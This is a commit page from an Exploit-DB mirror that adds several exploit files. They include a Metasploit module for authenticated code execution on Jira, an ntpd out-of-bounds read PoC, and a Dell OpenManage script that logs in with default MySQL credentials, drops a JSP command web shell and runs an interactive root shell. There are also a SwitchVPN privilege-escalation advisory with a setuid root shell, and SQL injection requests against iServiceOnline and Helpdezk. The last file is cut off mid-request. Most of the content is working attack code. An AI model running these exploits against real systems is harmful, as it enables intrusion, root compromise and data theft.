bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-15

Browse source 
15 changes to exploits/shellcodes

AMPPS 2.7 - Denial of Service (PoC)
Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)
ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
SwitchVPN for macOS 2.1012.03 - Privilege Escalation

Atlassian Jira - Authenticated Upload Code Execution (Metasploit)
iServiceOnline 1.0 - 'r' SQL Injection
Helpdezk 1.1.1 - 'query' SQL Injection
Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
EdTv 2 - 'id' SQL Injection
Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities
Advanced Comment System 1.0 - SQL Injection
Rmedia SMS 1.0 - SQL Injection
Pedidos 1.0 - SQL Injection
Electricks eCommerce 1.0 - Persistent Cross-Site Scripting
DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload
This commit is contained in:
Offensive Security 2018-11-15 05:01:40 +00:00
parent 3a7153b2ac
commit 1d25aee539
16 changed files with 1310 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

233
exploits/java/remote/45851.rb Executable file
View file

@ -0,0 +1,233 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Atlassian Jira Authenticated Upload Code Execution',
'Description' => %q{
This module can be used to execute a payload on Atlassian Jira via
the Universal Plugin Manager(UPM). The module requires valid login
credentials to an account that has access to the plugin manager.
The payload is uploaded as a JAR archive containing a servlet using
a POST request against the UPM component. The check command will
test the validity of user supplied credentials and test for access
to the plugin manager.
},
'Author' => 'Alexander Gonzalez(dubfr33)',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],
['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],
['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']
],
'Platform' => %w[java],
'Targets' =>
[
['Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
]
],
'DisclosureDate' => 'Feb 22 2018'))
register_options(
[
Opt::RPORT(2990),
OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
])
end
def check
login_res = query_login
if login_res.nil?
vprint_error('Unable to access the web application!')
return CheckCode::Unknown
end
return CheckCode::Unknown unless login_res.code == 200
@session_id = get_sid(login_res)
@xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content']
auth_res = do_auth
good_sid = get_sid(auth_res)
good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
res = query_upm(good_cookie)
if res.nil?
vprint_error('Unable to access the web application!')
return CheckCode::Unknown
elsif res.code == 200
return Exploit::CheckCode::Appears
else
vprint_status('Something went wrong, make sure host is up and options are correct!')
vprint_status("HTTP Response Code: #{res.code}")
return Exploit::CheckCode::Unknown
end
end
def exploit
unless access_login?
fail_with(Failure::Unknown, 'Unable to access the web application!')
end
print_status('Retrieving Session ID and XSRF token...')
auth_res = do_auth
good_sid = get_sid(auth_res)
good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
res = query_for_upm_token(good_cookie)
if res.nil?
fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')
end
upm_token = res.headers['upm-token']
upload_exec(upm_token, good_cookie)
end
# Upload, execute, and remove servlet
def upload_exec(upm_token, good_cookie)
contents = ''
name = Rex::Text.rand_text_alpha(8..12)
atlassian_plugin_xml = %Q{
<atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
<plugin-info>
<description></description>
<version>1.0</version>
<vendor name="" url="" />
<param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
<param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
</plugin-info>
<servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
<description>"#{name}"</description>
<url-pattern>/metasploit/PayloadServlet</url-pattern>
</servlet>
</atlassian-plugin>
}
# Generates .jar file for upload
zip = payload.encoded_jar
zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
zip.add_file('/metasploit/PayloadServlet.class', servlet)
contents = zip.pack
boundary = rand_text_numeric(27)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
print_status("Attempting to upload #{name}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),
'vars_get' =>
{
'token' => "#{upm_token}"
},
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Cookie' => good_cookie.to_s
}
}, 25)
unless res && res.code == 202
print_status("Error uploading #{name}")
print_status("HTTP Response Code: #{res.code}")
print_status("Server Response: #{res.body}")
return
end
print_status("Successfully uploaded #{name}")
print_status("Executing #{name}")
Rex::ThreadSafe.sleep(3)
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
'method' => 'GET',
'cookie' => good_cookie.to_s
})
print_status("Deleting #{name}")
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
'method' => 'DELETE',
'cookie' => good_cookie.to_s
})
end
def access_login?
res = query_login
if res.nil?
fail_with(Failure::Unknown, 'Unable to access the web application!')
end
return false unless res && res.code == 200
@session_id = get_sid(res)
@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
return true
end
# Sends GET request to login page so the HTTP response can be used
def query_login
send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))
end
# Queries plugin manager to verify access
def query_upm(good_cookie)
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
'method' => 'GET',
'cookie' => good_cookie.to_s
})
end
# Queries API for response containing upm_token
def query_for_upm_token(good_cookie)
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
'method' => 'GET',
'cookie' => good_cookie.to_s
})
end
# Authenticates to webapp with user supplied credentials
def do_auth
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'),
'method' => 'POST',
'cookie' => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}",
'vars_post' => {
'os_username' => datastore['HttpUsername'],
'os_password' => datastore['HttpPassword'],
'os_destination' => '',
'user_role' => '',
'atl_token' => '',
'login' => 'Log+In'
}
})
end
# Finds SID from HTTP response headers
def get_sid(res)
if res.nil?
return '' if res.blank?
end
res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
end
end

60
exploits/linux/local/45846.py Executable file
View file

@ -0,0 +1,60 @@
# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/blog/cve-2018-7182
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz
# Version: ntp 4.2.8p6 - 4.2.8p10
# CVE: CVE-2018-7182
# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind
#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf
#==50079== Memcheck, a memory error detector
#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
#==50079==
#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting
#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)
#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log
#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123
#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123
#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123
#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123
#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123
#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123
#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates
#==50079== Invalid read of size 1
#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd
#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)
#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
#==50079==
#!/usr/bin/env python
import sys
import socket
buf = ("\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\x39\x6e\x6f\x6e\x63" +
"\x65\x3d\x64\x61\x33\x65\x62\x35\x31\x65\x62\x30\x32\x38\x38\x38" +
"\x64\x61\x32\x30\x39\x36\x34\x31\x39\x63\x2c\x20\x66\x72\x61\x67" +
"\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x00\x31\x32\x37\x2e" +
"\x30\x2e\x30\x2e\x31\x00\x00\x00")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

227
exploits/linux/webapps/45852.py Executable file
View file

@ -0,0 +1,227 @@
'''
KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities
Title: Dell OpenManage Network Manager Multiple Vulnerabilities
Advisory ID: KL-001-2018-009
Publication Date: 2018.11.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-009.txt
1. Vulnerability Details
Affected Vendor: Dell
Affected Product: OpenManage Network Manager
Affected Version: 6.2.0.51 SP3
Platform: Embedded Linux
CWE Classification: CWE-285: Improper Authorization,
CWE-284: Improper Access Control
Impact: Privilege Escalation
Attack vector: MySQL, HTTP
CVE ID: CVE-2018-15767, CVE-2018-15768
2. Vulnerability Description
Dell OpenManage Network Manager exposes a MySQL listener that
can be accessed with default credentials (CVE-2018-15768). This
MySQL service is running as the root user, so an attacker can
exploit this configuration to, e.g., deploy a backdoor and
escalate privileges into the root account (CVE-2018-15767).
3. Technical Description
The appliance binds on 3306/mysql using the 0.0.0.0 IP
address. The default IPTables policy is ACCEPT and the
rule table is empty. Using any of three default accounts,
a malicious user can exploit native MySQL functionality to
place a JSP shell into the directory of a web server on the
file system and subsequently make calls into it.
4. Mitigation and Remediation Recommendation
The vendor informed KoreLogic that all default passwords can
be changed and are documented in the OpenManage Network Manager
Installation Guide. Dell recommends all customers change these
default passwords upon installation.
The vendor has addressed these vulnerabilities in version
6.5.3. Release notes and download instructions can be found at:
https://www.dell.com/support/home/us/en/04/drivers/driversdetails?driverId=5XC0J
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2018.02.16 - KoreLogic submits vulnerability details to Dell.
2018.02.16 - Dell acknowledges receipt.
2018.04.02 - Dell informs KoreLogic that a rememdiation plan is in
place and requests approximately two months continued
embargo on the vulnerability details.
2018.04.23 - 45 business days have elapsed since the vulnerability
was reported to Dell.
2018.05.14 - 60 business days have elapsed since the vulnerability
was reported to Dell.
2018.06.05 - 75 business days have elapsed since the vulnerability
was reported to Dell.
2018.06.11 - Dell informs KoreLogic that the patched version has
been released and asks that the KoreLogic advisory
remain unpublished until 2018.06.22.
2018.06.21 - Dell requests additional time to coordinate changes
to the MySQL implementation, noting that this
driver is provided by and upstream vendor.
2018.07.11 - 100 business days have elapsed since the
vulnerability was reported to Dell.
2018.07.16 - Dell informs KoreLogic that the remediations are
targeted for version 6.5.3, slated for a September
release.
2018.08.08 - 120 business days have elapsed since the
vulnerability was reported to Dell.
2018.09.20 - 150 business days have elapsed since the
vulnerability was reported to Dell.
2018.10.03 - Dell informs KoreLogic that version 6.5.3 is
scheduled to be released 2018.10.08.
2018.10.11 - Dell and KoreLogic begin mutual review of
disclosure statements.
2018.11.02 - Dell issues public advisory-
https://www.dell.com/support/article/us/en/19/sln314610;
180 business days have elapsed since the
vulnerability was reported to Dell.
2018.11.05 - KoreLogic Disclosure.
7. Proof of Concept
'''
#!/usr/bin/python
# $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
# Dell OpenManage NetworkManager 6.2.0.51 SP3
# SQL backdoor remote root
#
# [-] Starting attack.
# [+] Connected using root account.
# [+] Sending malicious SQL.
# [+] Dropping shell.
# [-] uid=0(root) gid=0(root) groups=0(root)
#
# # uname -a
# Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
from optparse import OptionParser
from string import ascii_letters, digits
from random import choice
from re import compile as regex_compile
from urllib import urlopen
import pymysql.cursors
banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
accounts = ['root','owmeta','oware']
password = 'dorado'
regex = regex_compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
full_path = '/opt/VAroot/dell/openmanage/networkmanager/oware/synergy/tomcat-7.0.40/webapps/nvhelp/%s.jsp' % (''.join(
[choice(digits + ascii_letters) for i in xrange(8)]))
shell_name = full_path.split('/')[-1]
backdoor = """<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String m = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
def do_shell(ip_address):
fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % ('sudo sh -c id'))
print "[-] %s\n" % fd.read().strip()
fd.close()
while True:
try:
cmd = 'sudo sh -c %s' % raw_input("# ")
if ('exit' in cmd or 'quit' in cmd):
break
fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % (cmd))
print fd.read().strip()
fd.close()
except KeyboardInterrupt:
print "Exiting."
exit(0)
return False
if __name__=="__main__":
print banner
parser = OptionParser()
parser.add_option("--host",dest="host",default=None,help="Target IP address")
o, a = parser.parse_args()
if o.host is None:
print "[!] Please provide the required parameters."
exit(1)
elif not regex.match(o.host):
print "[!] --host must contain an IP address."
exit(1)
else:
print "[-] Starting attack."
try:
for user in accounts:
conn = pymysql.connect(host=o.host,
user=user,
password=password,
db='mysql',
cursorclass=pymysql.cursors.DictCursor
)
if conn.user is user:
print "[+] Connected using %s account." % (user)
cursor = conn.cursor()
print "[+] Sending malicious SQL."
table_name = ''.join(
[choice(digits + ascii_letters) for i in xrange(8)])
column_name = ''.join(
[choice(digits + ascii_letters) for i in xrange(8)])
cursor.execute('create table %s (%s text)' % (table_name, column_name))
cursor.execute("insert into %s (%s) values ('%s')" % (table_name, column_name, backdoor))
conn.commit()
cursor.execute('select * from %s into outfile "%s" fields escaped by ""' % (table_name,full_path))
cursor.execute('drop table if exists `%s`' % (table_name))
conn.commit()
cursor.execute('flush logs')
print "[+] Dropping shell."
do_shell(o.host)
break
except Exception as e:
if e[0] == '1045':
print "[!] Hardcoded SQL credentials failed." % (e)
else:
print "[!] Could not execute attack. Reason: %s." % (e)
exit(0)
'''
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
'''

230
exploits/macos/local/45854.txt Normal file
View file

@ -0,0 +1,230 @@
=======================================================================
Title: Privilege Escalation Vulnerability
Product: SwitchVPN for MacOS
Vulnerable version: 2.1012.03
CVE ID: CVE-2018-18860
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================
Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful.
Our exclusive VPN Service technology is constantly being upgraded by a
dedicated
team of internet security experts."
Source: https://switchvpn.net/
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the SwitchVPN
client.
Users are urged to uninstall the SwitchVPN client for MacOS until the
issues have
been fixed.
Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation Vulnerability (reserved CVE-2018-18860)
After installation or an update, the script "fix_permissions.sh" is run by
the application. This script changes the owner of the main application
binaries
to root and sets them to world-writable. Additionally, the SUID bit is set
for
another sensitive binary in the application folder. This configuration
makes it
very easy to escalate privileges to root.
After the installation or update of SwitchVPN, the following script is run:
============================================================================================
...
switchvpn_updater.dat
mb:MacOS b$ file switchvpn_updater.dat
switchvpn_updater.dat: Qt Binary Resource file
...
if (systemInfo.kernelType === "darwin") {
console.log("Run permissions\n");
component.addElevatedOperation("Execute",
"/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/fix_permissions.sh");
}
...
============================================================================================
mb:MacOS b$ cat fix_permissions.sh
#!/bin/sh
chown -R root /Applications/SwitchVPN/SwitchVPN.app/
chgrp -R admin /Applications/SwitchVPN/SwitchVPN.app/
chmod -R 777 /Applications/SwitchVPN/SwitchVPN.app/
chmod -R u+s /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/compose8
============================================================================================
This leads to an overpermissive application configuration:
============================================================================================
mb:MacOS b$ ls -al
total 18720
drwxrwxrwx 35 root admin 1120 Sep 29 20:39 .
drwxrwxrwx 16 root admin 512 Sep 29 20:39 ..
-rwxrwxrwx 1 root admin 106224 Oct 12 2017 SwitchVPN
-rwxrwxrwx 1 root admin 4693216 Oct 12 2017 SwitchVPN_GUI
-r-xr-xr-x 1 root wheel 2859376 Oct 12 2017 compose
-r-xr-xr-x 1 root wheel 29184 Oct 12 2017 compose10
-r-xr-xr-x 1 root wheel 29184 Oct 12 2017 compose11
-r-xr-xr-x 1 root wheel 59152 Oct 12 2017 compose3
-r-xr-xr-x 1 root wheel 39008 Oct 12 2017 compose4
-r-xr-xr-x 1 root wheel 587776 Oct 12 2017 compose6
-r-xr-xr-x 1 root wheel 278848 Oct 12 2017 compose7
-r-sr-xr-x 1 root wheel 22800 Oct 12 2017 compose8
-r-xr-xr-x 1 root wheel 19056 Oct 12 2017 compose9
-r-xr-xr-x 1 root wheel 132160 Oct 12 2017 composec
-r-xr-xr-x 1 root wheel 510464 Oct 12 2017 composecn
-r-xr-xr-x 1 root wheel 5632 Oct 12 2017 down.sh
-rwxrwxrwx 1 root admin 245 Oct 12 2017 fix_permissions.sh
-rw-r--r-- 1 root admin 56 Sep 29 20:39 log.txt
-r-xr-xr-x 1 root wheel 39050 Oct 12 2017 up.sh
============================================================================================
Further investigation shows, that the "SwitchVPN_GUI" binary is run as root:
============================================================================================
mb:MacOS b$ ps aux | grep -i switch
root 15165 4.6 0.4 4515952 72912 ?? S 8:39PM
0:08.84 SwitchVPN_GUI
============================================================================================
After statically analysing the "SwitchVPN" binary, it became clear, that it
runs the "compose8" SUID root binary. Further analysis showed, that
"compose8"
subsequently runs the "SwitchVPN_GUI" binary and since it's world-writable,
an
attacker can exploit the situation to escalate privileges.
============================================================================================
# SwitchVPN -> compose8
...add rdx, [rdx+10h]
lea rsi, aCompose8_0 ; "compose8"
lea rcx, aSwitchvpn ; "SwitchVPN"
xor r9d, r9d
xor eax, eax
mov rdi, rbx ; char *
mov r8, r14
call _execl
...
============================================================================================
============================================================================================
# compose8 -> SwitchVPN_GUI
...
lea rsi, aCompose8WillIn ; "Compose8 will invoke GUI app %s, %s\n"
xor eax, eax
mov rdx, rbx
mov rcx, r12
call _fprintf
cmp r15d, 4
lea rdx, aB ; "-b"
cmovnz rdx, r14
xor ecx, ecx
xor eax, eax
mov rdi, rbx ; char *
mov rsi, r12 ; char *
call _execl
...
============================================================================================
Running the "SwitchVPN" binary from the command line confirms the issue:
============================================================================================
./SwitchVPN
This app (compose8) invoked with args:
/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS, SwitchVPN
Compose8 will invoke GUI app
/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/SwitchVPN_GUI,
SwitchVPN_GUI
============================================================================================
Proof of concept:
-----------------
1) Privilege Escalation Vulnerability
A situation like the one described above provides a wide range of
possibilities for escalating privileges to root. A quick and easy way is to
write the following shell script to "SwitchVPN_GUI":
============================================================================================
#!/bin/bash
chown root /tmp/shell
chmod 4755 /tmp/shell
============================================================================================
Create and compile the following execve() based shell:
============================================================================================
#include <stdlib.h>
#include <unistd.h>
main () {
setuid(0);
seteuid(0);
setgid(0);
execve("/bin/sh", 0, 0);
}
gcc shell.c -o shell
============================================================================================
Copy the shell binary to an attacker controlled location (e.g. /tmp).
Start the "SwitchVPN.app" as a local, unprivileged user. Afterwards the
execution of /tmp/shell will drop the user/attacker to a root shell:
============================================================================================
-rwsr-xr-x 1 root wheel 8576 Sep 29 20:34 shell
-rw-r--r-- 1 b wheel 127 Sep 29 20:33 shell.c
bash-3.2$ whoami
b
bash-3.2$ ./shell
bash-3.2# whoami
root
============================================================================================
Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well.
Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via https://switchvpn.net
2018-10-10: Contacted vendor through mark@switchvpn.com
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to mark@switchvpn.com
2018-10-31: Requested status update from vendor
2018-11-12: Informed vendor about advisory release
Solution:
---------
None.
Workaround:
-----------
None.
EOF B. Leitner / @2018

36
exploits/php/webapps/45845.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: iServiceOnline 1.0 - 'r' SQL Injection
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/iserviceonline/
# Software Link: https://netcologne.dl.sourceforge.net/project/iserviceonline/iService_Eng.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/app/index.php?r=Report/Repair
#
POST /[PATH]/app/index.php?r=Report/Repair HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 645
year=2018%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29
HTTP/1.1 500 CDbException
Date: Mon, 12 Nov 2018 14:02:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=h1lhf4nk6tjttk3ohei1a4ikn1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

88
exploits/php/webapps/45847.txt Normal file
View file

@ -0,0 +1,88 @@
# Exploit Title: Helpdezk 1.1.1 - 'query' SQL Injection
# Dork: N/A
# Date: 2018-11-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/widget/json/
#
POST /PATH/admin/widget/json/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 270
query=' uniOn SeleCt (SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),2,3,4-- -&qtype=name
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 20:05:56 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/admin/relReject/table_json/
#
POST /PATH/admin/relReject/table_json/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
